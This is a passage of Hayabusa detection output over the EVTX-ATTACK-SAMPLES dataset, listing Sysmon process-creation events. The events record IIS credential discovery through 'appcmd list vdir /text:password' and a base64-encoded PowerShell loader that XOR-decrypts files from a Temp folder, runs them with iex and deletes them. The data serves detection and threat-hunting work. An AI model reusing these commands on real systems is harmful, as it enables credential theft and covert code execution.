AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
